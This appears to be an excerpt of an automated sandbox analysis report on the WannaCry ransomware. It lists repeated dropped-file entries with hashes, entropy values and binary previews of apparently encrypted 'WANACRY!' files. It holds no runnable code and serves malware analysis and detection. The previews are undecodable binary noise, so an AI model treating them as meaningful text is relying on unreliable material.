                                                                              Preview:WANACRY!....7;..!yxT..S.m.i..........{.'.mI..,..F.......s...G;.Kx..??.rY.!.0'cA.3...u5.P..+~..'.m>Ip...P{...>5....I....tk.....\`9+_.7N#G.7.c..@.z|......Z.{...FF........|.....f$ ...x5.$..+...."Z.h...U.p....Y.8>..M+.V!..1.."}....|..HrY.L..B}./.=...O'd2*l....}..............*.....~E(..@#.U)8.Q.....1.yP..rA.S...R..V..C.A.x.]!...!....<.(..!.N....].\?......3.V..[...Yoxy.......J..o.>O.[.@O..ZW.5.Q0@......x.I.).......[..!....y.3....f.9. ..pe. ....b.....z.G9...F_...N...Z.V....e....aK.:.&..e......s....c....$.g.~...i...^...Z....>....P....sU..D<i..#Z.<...:1.`Z.,...~...|..Pn..`..J..ao......f.n......t...#.....f}.....)8.......:......3.P0.d8...]K.q.D....k....z|B.A.$IG..`......?x..d.M.R...A..z.!7/..............2......g.Am...-R...)D..]...H...+v.c.........H.aPDp..|.v.....]... .B..2.'.k1)2h..&...p.bvy.h.;"..$V%.W....g...R.)=-e.`.^B0.<...$h.....r....7..]..............TYz.x.2s...j....*q.t.G..>..GS.u.>.^..K.....P:...&)..~..(.B.zzAC.qn.>......g}.\A..C.-.N![....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.841061576594954
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkk+LMS7gpHDTwk4w35tWMff4sya9ar0ts+hVOhOGssQ3LsFd6Zm:bkjLMS0w9wjWMWa9arL+RsQG8Zm
                                                                              MD5:C38A46A5554741694D132D1B2DF9B4C3
                                                                              SHA1:E63A51E6FA621E1068B0D68CD2D8BF55F9FCD5D0
                                                                              SHA-256:8E8D3A2E26D17CD1B7AA34160930BFD1ACF1E9C3ECFCA694C07CD1D5A51FF171
                                                                              SHA-512:F1524C25AF800A4D9AE8DD486E119E0266109701051D16BA6FDCE9EFF36139D0393A3A7888D058C730E63C5898DE72248B0F2CE620888122B5A422122A06C491
                                                                              Malicious:false
                                                                              Preview:WANACRY!......Sq.T.g....&..33..I.t..l.........'..O6...i.bVW..9..A.......9.L.j....._.g[.#_.W...aL..$!........C....I.<f!.../.........|.}d*.....<..+....T.0.%.ZG.7!.U...?K.+...4.H2$.5x+.X...)1.V..3;.a.D..3.[.........p.8S..0..;.g...3;....l...c.z.....I.n^.8.._.............I..j-~..Q...s..@......2.B..`.nf.K3Y....pd..=^...........2...d6b.....q.eN.qEr?I....&.N...(..Q$../..\..\.CTe..@}?C.Zc..-DV8.Qb.IiJ..p..+_a&.4..dC\.....Y.).S.}M.sU.....\j......,.XaCU.....^.....+#.y.....9.....b..Y...DfO..V....GW....5.Q....N...j..\`..@..?. ....._H....48..{..h..X..L.....m..D.....+..P.%......../.y.).s.~.BR.W!.._i6z.w.,....a...P....jg0a.."..5..W&....@....d..*.{..9L.?.......16..x.WZ.wP.fa.`...J`}dx.....;..|Uh...1.r..B.@.}.|n.s........].7X.)..}M.:.!.a...U.{.u.....P&.R..+y'......l....#.....9.RD..I..B....$6....ty3../M.....q.&..m..<.`.wX.\.`_.P.w...|.^....aq...Q....U}......:...~...}R#..3C.Ch....D../.{.3..K.>..S.........?j.%..K./.F.l.............&....../.O?D.G.0..M..q..9.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.841061576594954
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkk+LMS7gpHDTwk4w35tWMff4sya9ar0ts+hVOhOGssQ3LsFd6Zm:bkjLMS0w9wjWMWa9arL+RsQG8Zm
                                                                              MD5:C38A46A5554741694D132D1B2DF9B4C3
                                                                              SHA1:E63A51E6FA621E1068B0D68CD2D8BF55F9FCD5D0
                                                                              SHA-256:8E8D3A2E26D17CD1B7AA34160930BFD1ACF1E9C3ECFCA694C07CD1D5A51FF171
                                                                              SHA-512:F1524C25AF800A4D9AE8DD486E119E0266109701051D16BA6FDCE9EFF36139D0393A3A7888D058C730E63C5898DE72248B0F2CE620888122B5A422122A06C491
                                                                              Malicious:false
                                                                              Preview:WANACRY!......Sq.T.g....&..33..I.t..l.........'..O6...i.bVW..9..A.......9.L.j....._.g[.#_.W...aL..$!........C....I.<f!.../.........|.}d*.....<..+....T.0.%.ZG.7!.U...?K.+...4.H2$.5x+.X...)1.V..3;.a.D..3.[.........p.8S..0..;.g...3;....l...c.z.....I.n^.8.._.............I..j-~..Q...s..@......2.B..`.nf.K3Y....pd..=^...........2...d6b.....q.eN.qEr?I....&.N...(..Q$../..\..\.CTe..@}?C.Zc..-DV8.Qb.IiJ..p..+_a&.4..dC\.....Y.).S.}M.sU.....\j......,.XaCU.....^.....+#.y.....9.....b..Y...DfO..V....GW....5.Q....N...j..\`..@..?. ....._H....48..{..h..X..L.....m..D.....+..P.%......../.y.).s.~.BR.W!.._i6z.w.,....a...P....jg0a.."..5..W&....@....d..*.{..9L.?.......16..x.WZ.wP.fa.`...J`}dx.....;..|Uh...1.r..B.@.}.|n.s........].7X.)..}M.:.!.a...U.{.u.....P&.R..+y'......l....#.....9.RD..I..B....$6....ty3../M.....q.&..m..<.`.wX.\.`_.P.w...|.^....aq...Q....U}......:...~...}R#..3C.Ch....D../.{.3..K.>..S.........?j.%..K./.F.l.............&....../.O?D.G.0..M..q..9.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.830709953359941
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkHJ5IVGtQDMqBcY8M72TuU4L1ck5ptnCmSLI0AiKYvysu29X8wtWAMi:bkp5IVGtwMy8M6Tmxck7nuXyeX8wky
                                                                              MD5:7A4E95280FF8196864CC7F72A27C4833
                                                                              SHA1:FF17B1C733781959B00CF83A0A610072726B6BE3
                                                                              SHA-256:0AE259C07D8F5BA502FFFB398B5340CD7C1FAA3728BD85E98027D48CA577A99E
                                                                              SHA-512:D13D2600E75BE4E4085680BBC9E6C122DAC74E3CBD305BBB71F349F15885E903DC1E53F7BB58D80CCBC633039DD46F5824A848E501A00D86830A40CC597542F2
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....j...u*...kE\..1G.20.%...+...b8....:I8F$Y..\!......>..KR.Y.?T.:.6..IXf......P.3;..P...U.T.f...1.P..,..I...D..X.e.O....~.s.....W/..n.?....0.w.4.u.:.._./<..l..&9..J.q..@.!I.v!..........}%.0sY".S){..wp^..~..I..S~.4A...Q......!>0...Z.......Y..,&.M....5..............2Q]j}m.$. ..$.A.bX..gd........E...YW..'..".+.#0.....w....Ze..6.I#....%.$.Z.W].:.r.?..|..Ug..G.........rC..qv...k.Nu....O.Y].uC .B.&......b......".....).....+.2t:P.jM<aO...bJ.Ug...b.p|Z..#...&4|=a./ l....c[.Z...<.bV.h.-.R...=....:..4P....=..2o.......w.h.d....r..;....u.w.Q.)..b8.b...B.Ou...B...=.]O.*..}Q...~..!.+......#....<..M.X..:G...E2C....zu.A..,.=>....]WmU.~9...`....D../....xSkF."....EVpy..4..&)^wq.....K.....GW<..1ZO..=SGW~}l.=...{...UZL|.tW6...w....tU.'.EF..^.+y.4#.H.....p...`%...0..j.e..8AjS..y.v."r.wemfEM...G.O......|....a9O..B..%...o|.U....p1...V3..tO..m'UE..f..@m..?.f...7..M..o(....I..gYg.. !.J .....[...+.c..O.>......C.K.G?..y.U.....Iu..X.9d...r.9V{.{.k..t./)..+.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.830709953359941
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkHJ5IVGtQDMqBcY8M72TuU4L1ck5ptnCmSLI0AiKYvysu29X8wtWAMi:bkp5IVGtwMy8M6Tmxck7nuXyeX8wky
                                                                              MD5:7A4E95280FF8196864CC7F72A27C4833
                                                                              SHA1:FF17B1C733781959B00CF83A0A610072726B6BE3
                                                                              SHA-256:0AE259C07D8F5BA502FFFB398B5340CD7C1FAA3728BD85E98027D48CA577A99E
                                                                              SHA-512:D13D2600E75BE4E4085680BBC9E6C122DAC74E3CBD305BBB71F349F15885E903DC1E53F7BB58D80CCBC633039DD46F5824A848E501A00D86830A40CC597542F2
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....j...u*...kE\..1G.20.%...+...b8....:I8F$Y..\!......>..KR.Y.?T.:.6..IXf......P.3;..P...U.T.f...1.P..,..I...D..X.e.O....~.s.....W/..n.?....0.w.4.u.:.._./<..l..&9..J.q..@.!I.v!..........}%.0sY".S){..wp^..~..I..S~.4A...Q......!>0...Z.......Y..,&.M....5..............2Q]j}m.$. ..$.A.bX..gd........E...YW..'..".+.#0.....w....Ze..6.I#....%.$.Z.W].:.r.?..|..Ug..G.........rC..qv...k.Nu....O.Y].uC .B.&......b......".....).....+.2t:P.jM<aO...bJ.Ug...b.p|Z..#...&4|=a./ l....c[.Z...<.bV.h.-.R...=....:..4P....=..2o.......w.h.d....r..;....u.w.Q.)..b8.b...B.Ou...B...=.]O.*..}Q...~..!.+......#....<..M.X..:G...E2C....zu.A..,.=>....]WmU.~9...`....D../....xSkF."....EVpy..4..&)^wq.....K.....GW<..1ZO..=SGW~}l.=...{...UZL|.tW6...w....tU.'.EF..^.+y.4#.H.....p...`%...0..j.e..8AjS..y.v."r.wemfEM...G.O......|....a9O..B..%...o|.U....p1...V3..tO..m'UE..f..@m..?.f...7..M..o(....I..gYg.. !.J .....[...+.c..O.>......C.K.G?..y.U.....Iu..X.9d...r.9V{.{.k..t./)..+.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.825184692487689
                                                                              Encrypted:false
                                                                              SSDEEP:24:bk7h2spKy9AQBsJnYLhpOwW5ukxAiKC2wWuYDUlKAHoOmxNN34tIu:bk8hy9IJY+niiKC2w9ZlKj+
                                                                              MD5:E2B05BF74C6EC27807D7349A4B16FD2F
                                                                              SHA1:B8CEBC9F2D9BC125A4209831D04A122ACBAA9821
                                                                              SHA-256:7249A874405EAB9CE4D7257994F8F6CD162058E2D8ED1003E0266DFA2E6EB117
                                                                              SHA-512:3FDA92B20159A0C16C7D716480C555F0652B0F7EE3B7A4B20C3EBEACA0D9EB892D291670C526D560DB831B0751377C3F5AB9BD75E32AF2128D3CEB5E15414EF5
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....g..$./.$...n#.Q..D.B4...N..~F...'.yO........v..!..$..'....M.CP.cd^.....ND..U...5..o|j.%.d.Gw..|..._...*\`.Yz...b.J..r..O...{t.U..h|...].'>.y.;.E."..l.0.Y...$6W...f&0y...M.xK...i-..5......_.d.Y.?.q1u.oB.G..=.^..........L.=R.j.p4..j..|............s>.........R@..`.p......&....UI....S......V..(.hq...o.m.)..o:nF} .O.W...-.e.?.....@hz.x._..~...F.<..2...)...o........i#...(/:.l9.x.0.F...*..u-...D.c.-...+..|/L...3....x.$y..d.f.L.M;n.......&Z.z%.k xCV.Ff|.e....!R...9.yj..........<"...U..4...6.H?X./6.....t....lQ...*Bgj..hO...L..7.B..{vv..`D.G..-.W..B.T|.v.../-B....]..ae.\...'w.cD...W...B..... .....jA..a?...7....\.1...I.h..<..l.....y.0p..C..Mf..c+.....5....~.......by...UFL...f...........b.d..." ..b.m.Y.....8kl...&D.}.(=.......Z.AA.........3.4..b.y.S.K`<...*....Ja.fK.%k..M........w....:Z.c.V..$E...Yq.....O<..wG.0.~2..;?n|..NF...b....5.tb......E.7.....r..7..g..H".R.c|ve.e..$.&.....u._{a.<..$..@.w..wI.@...Z...N..n....]"$
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.825184692487689
                                                                              Encrypted:false
                                                                              SSDEEP:24:bk7h2spKy9AQBsJnYLhpOwW5ukxAiKC2wWuYDUlKAHoOmxNN34tIu:bk8hy9IJY+niiKC2w9ZlKj+
                                                                              MD5:E2B05BF74C6EC27807D7349A4B16FD2F
                                                                              SHA1:B8CEBC9F2D9BC125A4209831D04A122ACBAA9821
                                                                              SHA-256:7249A874405EAB9CE4D7257994F8F6CD162058E2D8ED1003E0266DFA2E6EB117
                                                                              SHA-512:3FDA92B20159A0C16C7D716480C555F0652B0F7EE3B7A4B20C3EBEACA0D9EB892D291670C526D560DB831B0751377C3F5AB9BD75E32AF2128D3CEB5E15414EF5
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....g..$./.$...n#.Q..D.B4...N..~F...'.yO........v..!..$..'....M.CP.cd^.....ND..U...5..o|j.%.d.Gw..|..._...*\`.Yz...b.J..r..O...{t.U..h|...].'>.y.;.E."..l.0.Y...$6W...f&0y...M.xK...i-..5......_.d.Y.?.q1u.oB.G..=.^..........L.=R.j.p4..j..|............s>.........R@..`.p......&....UI....S......V..(.hq...o.m.)..o:nF} .O.W...-.e.?.....@hz.x._..~...F.<..2...)...o........i#...(/:.l9.x.0.F...*..u-...D.c.-...+..|/L...3....x.$y..d.f.L.M;n.......&Z.z%.k xCV.Ff|.e....!R...9.yj..........<"...U..4...6.H?X./6.....t....lQ...*Bgj..hO...L..7.B..{vv..`D.G..-.W..B.T|.v.../-B....]..ae.\...'w.cD...W...B..... .....jA..a?...7....\.1...I.h..<..l.....y.0p..C..Mf..c+.....5....~.......by...UFL...f...........b.d..." ..b.m.Y.....8kl...&D.}.(=.......Z.AA.........3.4..b.y.S.K`<...*....Ja.fK.%k..M........w....:Z.c.V..$E...Yq.....O<..wG.0.~2..;?n|..NF...b....5.tb......E.7.....r..7..g..H".R.c|ve.e..$.&.....u._{a.<..$..@.w..wI.@...Z...N..n....]"$
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.847759894226901
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkvT330+bD+Rfq6mVQcb31t8qUxfJ0DDnI5Xg381TenjqouL1WSYLanv1tBBz1y:bkbE+yJMNbAzOXnIxgdeouLXYLanv1Ti
                                                                              MD5:EB01F525F845C3D090D912EACCCF52D8
                                                                              SHA1:9F90BB8D277D0A2854FDDF0691DF49BF0E6D7180
                                                                              SHA-256:AAD2AD878F3FC35539FBF3F3CCBC85D0D0253C770E119D8536E048C441A35D31
                                                                              SHA-512:758A536235DD1FFFEB2048ACE4024364A2E46984779211C34DA8E2A24D892DF4894943B85D35179EBFF72FBE331DE2F2B4B9E74C0135C9581DACCDB48FBC2FDC
                                                                              Malicious:false
                                                                              Preview:WANACRY!........J....*.n....~c....;}Nf.9..w...7`.U[o.I....\#....F...:........z...-.OU..Z ............(..m{Gk.xi.l......cY...!.5>....'.L...}.{h..|U.FXg%..2c...w.....a.m..h...M)..(qdR}p.W...V.........w.......u,..=...=).'R...jM].......+G..2.#..XF..g...Y..-.............\(&...Q9]..,.$...< :.?.a:y.S8dZ......Z..T.n.....e...K...Q..rz........MT. ."Ayr...[......j...P1...u...eJ.XG?.&..c...>...)..SR>........&n)..~...P.I.jY....8]....].W\...$m...jyb!d..F&.I..".j.+%,.i...]}.Jf.(.d5.W..........E.e.*...q&6d.Q..(.?..w........*..f...&J..........1b....Y.\..kFg...{'.%....2SI.f.U|*...QG.s.cK..fH!_U..}..#?..gzh.. ..,.SR!rY..<_..P.5^....2...>........d...T.T.z...i3..;A...(.U.. .).vjZ1...i....{...w.......).O`..|_.....P..|.l.(/.v;....>...Yu.P-.k...h'E..Lp..H.t. Z.:/.Lh+a"$E......."..`^.=.Mz%C...{29.c.1'%>.$..&;...yP6.=....J......:<.(.\..ia.A.v..2...,.....F..........l.3a.%..n.Nlx.0a.s\.P...N...Z:..Yo?..w.9L. ..oa../.M..sD.N]....,G9Q-.h..."4.t~It...e......s....z.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.847759894226901
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkvT330+bD+Rfq6mVQcb31t8qUxfJ0DDnI5Xg381TenjqouL1WSYLanv1tBBz1y:bkbE+yJMNbAzOXnIxgdeouLXYLanv1Ti
                                                                              MD5:EB01F525F845C3D090D912EACCCF52D8
                                                                              SHA1:9F90BB8D277D0A2854FDDF0691DF49BF0E6D7180
                                                                              SHA-256:AAD2AD878F3FC35539FBF3F3CCBC85D0D0253C770E119D8536E048C441A35D31
                                                                              SHA-512:758A536235DD1FFFEB2048ACE4024364A2E46984779211C34DA8E2A24D892DF4894943B85D35179EBFF72FBE331DE2F2B4B9E74C0135C9581DACCDB48FBC2FDC
                                                                              Malicious:false
                                                                              Preview:WANACRY!........J....*.n....~c....;}Nf.9..w...7`.U[o.I....\#....F...:........z...-.OU..Z ............(..m{Gk.xi.l......cY...!.5>....'.L...}.{h..|U.FXg%..2c...w.....a.m..h...M)..(qdR}p.W...V.........w.......u,..=...=).'R...jM].......+G..2.#..XF..g...Y..-.............\(&...Q9]..,.$...< :.?.a:y.S8dZ......Z..T.n.....e...K...Q..rz........MT. ."Ayr...[......j...P1...u...eJ.XG?.&..c...>...)..SR>........&n)..~...P.I.jY....8]....].W\...$m...jyb!d..F&.I..".j.+%,.i...]}.Jf.(.d5.W..........E.e.*...q&6d.Q..(.?..w........*..f...&J..........1b....Y.\..kFg...{'.%....2SI.f.U|*...QG.s.cK..fH!_U..}..#?..gzh.. ..,.SR!rY..<_..P.5^....2...>........d...T.T.z...i3..;A...(.U.. .).vjZ1...i....{...w.......).O`..|_.....P..|.l.(/.v;....>...Yu.P-.k...h'E..Lp..H.t. Z.:/.Lh+a"$E......."..`^.=.Mz%C...{29.c.1'%>.$..&;...yP6.=....J......:<.(.\..ia.A.v..2...,.....F..........l.3a.%..n.Nlx.0a.s\.P...N...Z:..Yo?..w.9L. ..oa../.M..sD.N]....,G9Q-.h..."4.t~It...e......s....z.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.844165562388834
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkc2SJ55lIYanoA3PpPyrqB4ETbbE2lbK984cfW5+2OQODfX:bkI8Z3wrW4ETXEBK4GZ2ObjX
                                                                              MD5:CEE89B429ED1B2BFD9928F4D09B79657
                                                                              SHA1:1399FECDD42317367B1FDE25E80C3C7C08907E86
                                                                              SHA-256:644D8CA2053FAD06E828A9520F806B6ED48326C91043858456CB90F4927A319C
                                                                              SHA-512:D15DC37F0DF65BB6ECFBF2D67E8CA1196D03064826B2AEFCC2D56A3BBCD8FB15E103A607500C858BA4170E8385A37863A7D5C00B42C3D321F25FB03CA2EFEA4C
                                                                              Malicious:false
                                                                              Preview:WANACRY!......q.{.Q...-...BC...C../s/..H..z..+rB/Y..m.......@..n.(.jV.Dq...f.....>I{.@a.a|.3...-g.=e.++Wcy....op,..&..1m.=...s.U...SL../.h.....0.3..n.....q../.A.....%+...6...a.Z..i...(......w.vZ..l......P..}-........R&...2...+|2.}DJ.G..-.`.o.......+6.+.q.63.............6.q.Z...~.>..,..K...k.x...\../.\.K........hVs.......=..+...Fq;..D.~;7....xY..7.2....G......(M.......Bl..f..f.m>e)..9`...wc.F.W...~...Vg.q..a.e~.NT.u...S.4..7...?.#.3hI.....,5S..n.m.x..U.Rw....'......d..M..x.'4..5.. ..%....w.46._.u^.g..DU....4.....mZB.\...*..E.>My..........'.V3...y.Hs..K5[...........#.5W....|SE..r..\...(LM.......D[..mU...?x...7....id.........e....zt..N,."..[?..6....@....p8...~.rU.z...(..$..D0...aj(.?..z.....nv...Z.........J..t...8p..!..(|.l..3..#.`.@Q..J.l4;;..'x..=.)^...@...X.....G....x.-m{......+..0....rS].+....*.[L.,.}.2....U.j..?..l......'...t.C...P_..MM=.h..e.........}.HL?....._*./..+'c..2.../.;@..(a...`.Pn.... .S.....0....<.9.j.8...O....N.$......a....t..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.844165562388834
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkc2SJ55lIYanoA3PpPyrqB4ETbbE2lbK984cfW5+2OQODfX:bkI8Z3wrW4ETXEBK4GZ2ObjX
                                                                              MD5:CEE89B429ED1B2BFD9928F4D09B79657
                                                                              SHA1:1399FECDD42317367B1FDE25E80C3C7C08907E86
                                                                              SHA-256:644D8CA2053FAD06E828A9520F806B6ED48326C91043858456CB90F4927A319C
                                                                              SHA-512:D15DC37F0DF65BB6ECFBF2D67E8CA1196D03064826B2AEFCC2D56A3BBCD8FB15E103A607500C858BA4170E8385A37863A7D5C00B42C3D321F25FB03CA2EFEA4C
                                                                              Malicious:false
                                                                              Preview:WANACRY!......q.{.Q...-...BC...C../s/..H..z..+rB/Y..m.......@..n.(.jV.Dq...f.....>I{.@a.a|.3...-g.=e.++Wcy....op,..&..1m.=...s.U...SL../.h.....0.3..n.....q../.A.....%+...6...a.Z..i...(......w.vZ..l......P..}-........R&...2...+|2.}DJ.G..-.`.o.......+6.+.q.63.............6.q.Z...~.>..,..K...k.x...\../.\.K........hVs.......=..+...Fq;..D.~;7....xY..7.2....G......(M.......Bl..f..f.m>e)..9`...wc.F.W...~...Vg.q..a.e~.NT.u...S.4..7...?.#.3hI.....,5S..n.m.x..U.Rw....'......d..M..x.'4..5.. ..%....w.46._.u^.g..DU....4.....mZB.\...*..E.>My..........'.V3...y.Hs..K5[...........#.5W....|SE..r..\...(LM.......D[..mU...?x...7....id.........e....zt..N,."..[?..6....@....p8...~.rU.z...(..$..D0...aj(.?..z.....nv...Z.........J..t...8p..!..(|.l..3..#.`.@Q..J.l4;;..'x..=.)^...@...X.....G....x.-m{......+..0....rS].+....*.[L.,.}.2....U.j..?..l......'...t.C...P_..MM=.h..e.........}.HL?....._*./..+'c..2.../.;@..(a...`.Pn.... .S.....0....<.9.j.8...O....N.$......a....t..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.844670631314164
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkIyMFRNuQFZbHvrBPZPpQv8Qh3DEFeMcyM88/Kwbm1NioPRsjiE:bkJMFfj/vvBQvb3DE+X/Kl1TmiE
                                                                              MD5:E323156EE11E855D11F5B526D62BB7A9
                                                                              SHA1:A16C4C1D2F53C58B38C80075DAC6D16291A7BB43
                                                                              SHA-256:23AA1727E0064815E65477AB5CA6CAFE9617287FFEB98D6515EA7226C851A83A
                                                                              SHA-512:7216FA816C895A5B7898A43024DD968EE3598B51BDF2E4CD8FD232DDB51FAC8E3A76FBC4401FFE86A9468FE670026C07C977526A505276CE059561851DE1CD35
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....wz.a.,..7p.4mJ.@z}~.pDW.....o...+.Z..K.....e.C..%.qc..^...x..^`.N.M..\W.8.........H.zFa[.DVcLm...9...E.xC./.z.m..g....j..r....[`..qf.b..\..BP4o...>.c...".]].....'..y.........O.......J.ZL...9m..$..I....u0O.+..`gHE.U.T.R.........$.6..2.....@R.>..#...............}....!..{GX5'.qv....oE........IjU1.#.6...P..H....R..b..].;..P....Tq\.a. ...D..2 ..rI.l.R.c.....j.c.GSy..........D).. .".-......EZ......b..#....3.9.0*x{.M.=F...5..g.F......S.L........zE..G.N.%.....r..e.r......d}.w3..^5/.q|.<S"....t...XT.gi..4....q{I..P.vX.c7..E....S..ba..D..x.a.=...../%.)rN......)......b..pu..Z..e9.D...(h...Mj>~q.Xj..>..X..u....\L...o1*.ob.......@.'.#.........V...a.U0Lm.X..4.. .?.t.W...$p....H.....;Iu.}..rh..i.Kb..a....N..A~..3."...{Us.G...O..%..k........Y.[<...^....6.x..04..m[Le|".x./....40...5..... .< .....bo.........p.....T.f.......p..e.J.W.l.nT8R.&....E..,...."..$.D^&l...c*].Q...Xe.gd...}.%h..ro.i...\.5..nh..)=Z...AMN......8o.[.5p.........|0*Q..n.f...]...L|..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.844670631314164
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkIyMFRNuQFZbHvrBPZPpQv8Qh3DEFeMcyM88/Kwbm1NioPRsjiE:bkJMFfj/vvBQvb3DE+X/Kl1TmiE
                                                                              MD5:E323156EE11E855D11F5B526D62BB7A9
                                                                              SHA1:A16C4C1D2F53C58B38C80075DAC6D16291A7BB43
                                                                              SHA-256:23AA1727E0064815E65477AB5CA6CAFE9617287FFEB98D6515EA7226C851A83A
                                                                              SHA-512:7216FA816C895A5B7898A43024DD968EE3598B51BDF2E4CD8FD232DDB51FAC8E3A76FBC4401FFE86A9468FE670026C07C977526A505276CE059561851DE1CD35
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....wz.a.,..7p.4mJ.@z}~.pDW.....o...+.Z..K.....e.C..%.qc..^...x..^`.N.M..\W.8.........H.zFa[.DVcLm...9...E.xC./.z.m..g....j..r....[`..qf.b..\..BP4o...>.c...".]].....'..y.........O.......J.ZL...9m..$..I....u0O.+..`gHE.U.T.R.........$.6..2.....@R.>..#...............}....!..{GX5'.qv....oE........IjU1.#.6...P..H....R..b..].;..P....Tq\.a. ...D..2 ..rI.l.R.c.....j.c.GSy..........D).. .".-......EZ......b..#....3.9.0*x{.M.=F...5..g.F......S.L........zE..G.N.%.....r..e.r......d}.w3..^5/.q|.<S"....t...XT.gi..4....q{I..P.vX.c7..E....S..ba..D..x.a.=...../%.)rN......)......b..pu..Z..e9.D...(h...Mj>~q.Xj..>..X..u....\L...o1*.ob.......@.'.#.........V...a.U0Lm.X..4.. .?.t.W...$p....H.....;Iu.}..rh..i.Kb..a....N..A~..3."...{Us.G...O..%..k........Y.[<...^....6.x..04..m[Le|".x./....40...5..... .< .....bo.........p.....T.f.......p..e.J.W.l.nT8R.&....E..,...."..$.D^&l...c*].Q...Xe.gd...}.%h..ro.i...\.5..nh..)=Z...AMN......8o.[.5p.........|0*Q..n.f...]...L|..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.828369191468604
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkFDyMFsq29HvzFJ4O3m3vDTQPjNZs/wGyVSE20QBI6qgbXdSVMZoXj61euOaUK:bkbKq2vBaO3mPQrNO/wjSf0QBI6qgbI8
                                                                              MD5:B90790F018C3B65F7DB1F5B04EBF269F
                                                                              SHA1:2C6FEAAA2D02FF54E516466AFC56F0DE333C5C90
                                                                              SHA-256:3159559FD438CA77592E057FA3E4C8250639CD7EB9EB07EED8A1F4831C8A895A
                                                                              SHA-512:55854131E1A86EB34885293A24F3B18ED15E6AAA954BAE854E57E00A4BAF9C2B5106F0E956E61D8393832F0E82E9CCCAACDFCD2503D2AC94C562CD9BFD0C8F86
                                                                              Malicious:false
                                                                              Preview:WANACRY!....."Dc..$...g/&...Bf.....Qq\F...('{l.$FmW......Jho...m...?.:.%BO...E.aN.TQ...S.Z...+7.(J)...;.r.....b.y.7.|...`.,Q.<@3.{t....l.Fh.....2M.]nx..#.f.P.../.b..5y.....ld.jK..).4...9.......8...k.......&...~.x.07.Fg.....I.#...V..Yi.i..1.K.p.#.. ...>:.%.............C..e6.J..*...Q2ci...>.~.....C.{.D!..G...?$........M...5..w...|gt_%..Nt..pm..w.......s.f.....xC=..G....L&.....f.A............8.>.N._#.,6..W..X.......;.(.......7*W..`.v\[.|i......s1,m.\.........r..5..d..6~]......c..>;-X7..XR$/.?....?h.@..Q*.8r.qT......x....b...^.W./..W.G.).........fo.9..8=....*B......%..\,...5......+....a..Iy..pb.J..U8...7B.d...iT8t.*t..fX..Rl.WU...`.....-z:..f.?67nmS.4..u...;...)....4......ki..n...+..c....U.IV.`k<...}&Qqg...........:..q...........,...t+.......W.!..........U....D.>A..nH..B.,..i......;...jy..2Y. :....6.q......:.S...T.ihM....},.pg...d.._...b.h%.(/.....{..Mb...Y0.....Y.D..u1x>.Qs...o..._...8.O...N.......".N...p}....2t..\....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.828369191468604
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkFDyMFsq29HvzFJ4O3m3vDTQPjNZs/wGyVSE20QBI6qgbXdSVMZoXj61euOaUK:bkbKq2vBaO3mPQrNO/wjSf0QBI6qgbI8
                                                                              MD5:B90790F018C3B65F7DB1F5B04EBF269F
                                                                              SHA1:2C6FEAAA2D02FF54E516466AFC56F0DE333C5C90
                                                                              SHA-256:3159559FD438CA77592E057FA3E4C8250639CD7EB9EB07EED8A1F4831C8A895A
                                                                              SHA-512:55854131E1A86EB34885293A24F3B18ED15E6AAA954BAE854E57E00A4BAF9C2B5106F0E956E61D8393832F0E82E9CCCAACDFCD2503D2AC94C562CD9BFD0C8F86
                                                                              Malicious:false
